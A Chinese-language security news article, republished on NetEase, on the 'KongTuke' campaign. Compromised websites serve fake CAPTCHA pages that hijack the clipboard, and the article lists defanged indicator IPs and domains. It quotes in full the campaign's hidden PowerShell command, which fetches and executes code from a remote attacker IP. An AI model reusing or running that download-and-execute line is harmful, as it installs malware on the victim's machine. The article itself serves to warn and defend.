网易首页 > 网易号 > 正文 申请入驻

【安全圈】“剪贴板劫持”利用伪造的验证码通过被黑网站窃取剪贴板数据

0
分享至

关键词

恶意软件

网络安全研究人员发现了一种名为“KongTuke”的复杂新型网络攻击链,它通过入侵合法网站攻击毫无戒心的互联网用户。

Palo Alto Networks 的 Unit 42 团队的 Bradley Duncan 在一份报告中详细介绍了此次攻击,该攻击利用恶意脚本和伪造的 CAPTCHA 页面劫持受害者的剪贴板并可能安装未识别的恶意软件。

该调查结果于 2025 年 4 月 4 日分享,Unit 42 Intel 在 X 上发布了更多见解,凸显了此次活动日益增长的威胁。

攻击链

KongTuke 攻击始于向合法但易受攻击的网站注入恶意脚本。报告中引用的一个例子是 hxxps://lancasternh[.]com/6t7y.js,它会将用户重定向到 hxxps://lancasternh[.]com/js.php 上的辅助脚本。

该脚本收集有关受害者设备的详细信息,包括 IP 地址、浏览器类型和引荐来源数据,以 base64 格式编码。

从那里,用户会被引导到一个模仿 CAPTCHA 的欺骗性“验证您是人类”页面,CAPTCHA 是一种常见的安全功能,旨在区分人类和机器人。

然而,这个 CAPTCHA 是个诡计。该页面不验证身份,而是采用一种称为“剪贴板劫持”或“粘贴劫持”的技术。它会秘密地将恶意的 PowerShell 脚本注入受害者的剪贴板,并附带指示,敦促用户通过 Windows 运行窗口粘贴并执行该脚本。

Duncan 详细描述了该脚本,其内容如下:

powershell -w h -c "iex $(irm 138.199.156[.]22:8080/$($z = [datetime]::UtcNow; $y = ([datetime]('01/01/' + '1970')); $x = ($z - $y).TotalSeconds; $w = [math]::Floor($x); $v = $w - ($w % 16); [int64]$v))"

此命令连接到远程服务器 138.199.156[.]22:8080,并根据时间戳计算检索其他恶意负载。

交通和感染后活动

根据 Unit 42 的报告,该脚本一旦执行,就会发起一系列网络请求。初始流量包括对同一 IP 地址的 GET 和 POST 请求,然后连接到 ecduutcykpvkbim[.]top 和 bfidmcjejlilflg[.]top 等域。

这些托管在 185.250.151[.]155:80 的域名似乎是进一步感染的中转站。感染后,受感染的系统通过 173.232.146[.]62:25658 与 8qvihxy8x5nyixj[.]top 建立命令和控制 (C2) 通信,使用 TLSv1.0 HTTPS 流量。

有趣的是,受感染的主机还使用 api.ipify[.]org 和 ipinfo[.]io 等服务执行 IP 地址检查,收集城市、地区和国家/地区等地理位置数据。虽然此步骤本身并不恶意,但它表明攻击者正在对受害者进行分析,以进行有针对性的利用。

熟悉却难以捉摸的威胁

网络安全社区一直在关注 KongTuke 活动,包括 Mastodon 上的 @monitorsg 和 ThreatFox,标签为 #KongTuke。邓肯指出,感染后的流量与著名远程访问木马 AsyncRAT 的模式相似。然而,最终的恶意软件负载仍未确定,因为研究人员尚未获得样本进行分析。这种不确定性凸显了威胁的不断演变以及打击威胁的挑战。

2025 年 4 月 4 日,Unit 42 Intel 通过 X 向公众发出警告,称:“在合法但被入侵的网站的页面中注入 #KongTuke 脚本会导致伪造的 # CAPTCHA样式页面和 #ClipboardHijacking(#pastejacking)。

这些页面要求用户将恶意脚本粘贴到运行窗口中。”该帖子可通过 https://x.com/Unit42_Intel/status/1908253830166323637 访问,其中包含更多详细信息的链接和虚假 CAPTCHA 页面的图片,强调了提高认识的紧迫性。

报告作者 Bradley Duncan 在他的笔记中强调了这次攻击的阴险性:“这个过程有时被称为‘剪贴板劫持’或‘粘贴劫持’,以例行验证为幌子诱骗用户执行有害代码。”使用受到感染的合法网站会增加一层信任,这使得攻击变得尤为危险。

网络安全专家敦促用户在遇到 CAPTCHA 提示时要小心谨慎,尤其是那些要求手动执行脚本的提示。合法的 CAPTCHA 通常涉及图像选择等简单任务,而不是复制和粘贴代码。用户还应保持系统更新,避免点击可疑链接,并使用强大的防病毒软件来检测和阻止此类威胁。

随着 KongTuke 活动的不断发展,Unit 42 及其他机构的研究人员正在努力识别最终的恶意软件并破坏攻击基础设施。目前,警惕仍然是防范这种在日常网络互动中利用信任的狡猾手段的最佳方法。

来源: https://cybersecuritynews.com/fake-captcha/

安全圈

网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
李娜出家已近29年:80岁老母亲含泪陪她住寺庙,如今她们过得怎样

李娜出家已近29年:80岁老母亲含泪陪她住寺庙,如今她们过得怎样

喜欢历史的阿繁
2026-05-20 00:16:42
拒不偿还470万元欠款,南京这名“老赖”犯拒执罪获刑!

拒不偿还470万元欠款,南京这名“老赖”犯拒执罪获刑!

环球网资讯
2026-05-20 19:52:47
演员王宁:这辈子我做的最错误决定,就是眼红沈腾,离开开心麻花

演员王宁:这辈子我做的最错误决定,就是眼红沈腾,离开开心麻花

草莓信箱
2026-05-18 22:24:19
​白嫖独立开发者,华为赢了KPI,却输尽了格局!

​白嫖独立开发者,华为赢了KPI,却输尽了格局!

虔青
2026-05-19 19:15:15
金俊峰任上海市农业科学院党委书记

金俊峰任上海市农业科学院党委书记

澎湃新闻
2026-05-20 16:08:26
建业集团欠薪8个月

建业集团欠薪8个月

地产微资讯
2026-05-20 15:00:37
马斯克转发重庆东站,一字未言,美国人反问:为什么我们做不到?

马斯克转发重庆东站,一字未言,美国人反问:为什么我们做不到?

周哥一影视
2026-05-20 08:54:16
上海大学生课堂上被叫醒后砸桌怒吼“杀杀杀”,老师卑微道歉

上海大学生课堂上被叫醒后砸桌怒吼“杀杀杀”,老师卑微道歉

听心堂
2026-05-20 13:59:39
许家印认罪!2.4万亿窟窿,家族只拿走500亿,其余真金白银去哪了

许家印认罪!2.4万亿窟窿,家族只拿走500亿,其余真金白银去哪了

蜉蝣说
2026-04-23 09:41:11
马家军突袭咸阳,扬言共军最怕马家骑兵,彭德怀:把重机枪调上来

马家军突袭咸阳,扬言共军最怕马家骑兵,彭德怀:把重机枪调上来

兴趣知识
2026-05-20 13:13:06
食用油检出致癌物?这4种油别再上餐桌,赶紧自查厨房

食用油检出致癌物?这4种油别再上餐桌,赶紧自查厨房

观星赏月
2026-05-20 19:21:26
母亲是前女排队长,父亲是香港公务员,15岁的她继承天赋开始争光

母亲是前女排队长,父亲是香港公务员,15岁的她继承天赋开始争光

云上乌托邦
2026-05-20 13:27:28
独臂父亲参加儿子的家长会,因太寒酸被笑话,校长一见他却突然下跪

独臂父亲参加儿子的家长会,因太寒酸被笑话,校长一见他却突然下跪

灿烂夏天
2025-04-06 17:24:59
黄仁勋送饮料给一个女生,为什么连问了两次人家:你喜欢养乐多吗

黄仁勋送饮料给一个女生,为什么连问了两次人家:你喜欢养乐多吗

西楼知趣杂谈
2026-05-19 06:57:24
王菲的“没事儿”,是多少成年人学不来的松弛

王菲的“没事儿”,是多少成年人学不来的松弛

青山闲客塞北翁
2026-05-20 15:04:37
普京访华,我国接待规格相当高,非常不一般

普京访华,我国接待规格相当高,非常不一般

DS北风
2026-05-20 07:18:03
泰国放弃购买世界杯版权!国际足联要价3.5亿远低于中国 仍嫌太贵

泰国放弃购买世界杯版权!国际足联要价3.5亿远低于中国 仍嫌太贵

念洲
2026-05-20 10:15:50
妈妈带2岁孩子送外卖后情绪崩溃:我凭什么背负这些还要养你!

妈妈带2岁孩子送外卖后情绪崩溃:我凭什么背负这些还要养你!

映射生活的身影
2026-05-20 16:55:01
再爆!樊思睿背景被扒,难怪这么嚣张,更可怕的还在后面

再爆!樊思睿背景被扒,难怪这么嚣张,更可怕的还在后面

金哥说新能源车
2026-05-20 12:08:56
中国家门口生变,东盟11国选边站队,缅甸交权菲律宾,菲改了身份

中国家门口生变,东盟11国选边站队,缅甸交权菲律宾,菲改了身份

安珈使者啊
2026-05-20 14:38:12
2026-05-20 20:39:00
安全圈
安全圈
国内首家大安全概念新媒体
6642文章数 4688关注度
往期回顾 全部

科技要闻

一文看懂谷歌I/O2026:谷歌打响智能体大战

头条要闻

村庄遇极端暴雨"袭击" 男子看着妻子被涌入的洪水冲走

头条要闻

村庄遇极端暴雨"袭击" 男子看着妻子被涌入的洪水冲走

体育要闻

不再美丽的阿森纳,终于成为英超冠军

娱乐要闻

王菲“没事儿”,成年人学不来的松弛

财经要闻

白酒榜|汾酒营收净利双增 口子窖"造富"

汽车要闻

焕新极氪009上市41.38万起 齐家版让MPV回归家庭

态度原创

手机
数码
艺术
旅游
亲子

手机要闻

最强Mate!华为Mate 90九月亮相:首发麒麟9050 硬刚iPhone 18 Pro

数码要闻

京东方首发千帧FHD 护眼电竞显示器 千帧硬实力引领电竞新时代

艺术要闻

18幅 玫瑰花与女子画作

旅游要闻

今年前四个月,中国内地访日游客数量同比下降55.1%

亲子要闻

2026新规+2025参考!新生儿纸尿裤测评10款好用又安全实用清单

无障碍浏览 进入关怀版